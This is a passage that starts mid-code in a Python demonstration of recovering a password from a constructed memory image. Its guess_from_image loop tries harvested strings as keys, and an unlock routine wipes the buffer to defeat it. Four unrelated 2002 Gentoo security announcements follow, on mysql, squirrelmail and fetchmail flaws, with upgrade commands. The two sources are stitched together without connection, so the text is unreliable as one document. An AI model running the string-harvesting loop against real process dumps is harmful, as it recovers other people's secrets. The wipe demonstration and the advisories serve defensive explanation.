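    buf[:] = b"\x00" * len(buf)


def unlock_volume(password_buf, salt, expected_key):
    """Check the password, then wipe it whether or not it matched. This is the
    handling the advisory says Cryptainer lacks: nothing printable is left."""
    try:
        return secrets.compare_digest(derive_key(password_buf, salt), expected_key)
    finally:
        wipe(password_buf)


def guess_from_image(image, salt, expected_key):
    """The attacker's loop from the advisory: with no limit on wrong attempts,
    try every harvested string as the password and return the one that unlocks."""
    for candidate in harvest_strings(image):
        if secrets.compare_digest(derive_key(candidate.encode("ascii"), salt), expected_key):
            return candidate
    return None


def snapshot(*regions):
    """Constructed stand-in for a process memory dump: the given buffers with
    binary junk around them. Not a real dump of anything."""
    junk = b"\x00\x7f\x01\xffMZ\x90\x00"
    return junk + junk.join(bytes(r) for r in regions) + junk


def scenario():
    """Run both sides on constructed data and return what each observed."""
    salt = b"\x5a" * 16                                    # constructed
    password = bytearray(b"correct-horse-battery")         # constructed
    expected_key = derive_key(password, salt)
    volume_path = bytearray(b"C:\\Users\\me\\vault.cryptainer")  # constructed
    before = guess_from_image(snapshot(password, volume_path), salt, expected_key)
    unlocked = unlock_volume(password, salt, expected_key)
    after = guess_from_image(snapshot(password, volume_path), salt, expected_key)
    return {"unlocked": unlocked, "recovered_before_wipe": before,
            "recovered_after_wipe": after, "buffer_after_wipe": bytes(password)}
```

Before the wipe the harvest yields both the password and the volume path, exactly the two items the advisory says are visible; after it, only the path. In a real program the password has to be read directly into the mutable buffer (the bytearray literal above is itself an immutable copy that only exists because the input is constructed), and any intermediate str or bytes copy defeats the wipe, which is why this discipline is much easier to apply in C than in a garbage-collected runtime.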




GLSA: mysql

2002-12-16 Thread Daniel Ahlberg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT 200212-2.1
- - 

PACKAGE : mysql
SUMMARY : remote DOS and arbitrary code execution
DATE    : 2002-12-15 12:12 UTC
EXPLOIT : remote

- - 

The original advisory sent by me contained a typo (net-misc/freeswan
should have been dev-db/mysql). This re-issue has the correct text.

- From e-matters advisory:

"We have discovered two flaws within the MySQL server that can be used
by any MySQL user to crash the server. Furthermore one of the flaws can
be used to bypass the MySQL password check or to execute arbitrary code
with the privileges of the user running mysqld.
   
We have also discovered an arbitrary size heap overflow within the mysql
client library and another vulnerability that allows to write '\0' to any
memory address. Both flaws could allow DOS attacks against or arbitrary
code execution within anything linked against libmysqlclient."

Read the full advisory at
http://security.e-matters.de/advisories/042002.html

SOLUTION

It is recommended that all Gentoo Linux users who are running
dev-db/mysql-3.23.53 and earlier update their systems as follows:

emerge rsync
emerge mysql
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
[EMAIL PROTECTED]
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE9/JgefT7nyhUpoZMRApRsAJ95aYUx7n0WEjXnBZlY8Zn7pYaLGwCfdGid
/yJgKoxAcgQMpT08CzM/tgI=
=kWbX
-END PGP SIGNATURE-



GLSA: squirrelmail

2002-12-16 Thread Daniel Ahlberg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT 200212-4
- - 

PACKAGE : squirrelmail
SUMMARY : cross site scripting
DATE    : 2002-12-15 14:12 UTC
EXPLOIT : remote

- - 

euronymous <[EMAIL PROTECTED]> found that read_body.php didn't
filter out user input for 'filter_dir' and 'mailbox', making an XSS
attack possible.

Read the full advisory at
http://f0kp.iplus.ru/bz/008.txt

SOLUTION

It is recommended that all Gentoo Linux users who are running
net-mail/squirrelmail-1.2.9 and earlier update their systems as follows:

emerge rsync
emerge squirrelmail
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE9/JPrfT7nyhUpoZMRAuUKAJ98w49ZxG/AzqPtINkcLHt83S568wCfeq+N
X8vYK73anWOOTITkoBwMRsY=
=5d7Y
-END PGP SIGNATURE-



GLSA: fetchmail

2002-12-16 Thread Daniel Ahlberg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT 200212-3
- - 

PACKAGE : fetchmail
SUMMARY : buffer overflow
DATE    : 2002-12-15 13:12 UTC
EXPLOIT : remote

- - 

- From e-matters advisory:

"In the light of recent discoveries we reaudited Fetchmail and found
another bufferoverflow within the default configuration. This heap
overflow can be used by remote attackers to crash it or to execute 
arbitrary code with the privileges of the user running fetchmail. 
Depending on the configuration this allows a remote root compromise."

Read the full advisory at
http://security.e-matters.de/advisories/052002.html

SOLUTION

It is recommended that all Gentoo Linux users who are running
net-mail/fetchmail-6.1.2 and earlier update their systems as follows:

emerge rsync
emerge fetchmail
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
[EMAIL PROTECTED]
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE9/H6GfT7nyhUpoZMRAsaYAJ91S9qnCMg7K52RKryLUMuWi0URIACgpFdF
AUF2cEn+Y8qLPsolPSSIf0s=
=nDtt
-END PGP SIGNATURE-



GLSA: mysql

2002-12-16 Thread Daniel Ahlberg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT 200212-2
- - 

PACKAGE : mysql
SUMMARY : remote DOS and arbitrary code execution
DATE    : 2002-12-15 12:12 UTC
EXPLOIT : remote

- - 

- From e-matters advisory:

"We have discovered two flaws within the MySQL server that can be used
by any MySQL user to crash the server. Furthermore one of the flaws can
be used to bypass the MySQL password check or to execute arbitrary code
with the privileges of the user running mysqld.
   
We have also discovered an arbitrary size heap overflow within the mysql
client library and another vulnerability that allows to write '\0' to any
memory address. Both flaws could allow DOS attacks against or arbitrary
code execution within anything linked against libmysqlclient."

Read the full advisory at
http://security.e-matters.de/advisories/042002.html

SOLUTION

It is recommended that all Gentoo Linux users who are running
net-misc/freeswan-3.23.53 and earlier update their systems as follows:

emerge rsync
emerge mysql
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
[EMAIL PROTECTED]
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE9/HS4fT7nyhUpoZMRAh7MAKDDjsF3TdzsFWQ7ZlSgkuQCWyhxjACgifSG
xISOZG8+mGVv1S6BQCs4+I8=
=AA47
-END PGP SIGNATURE-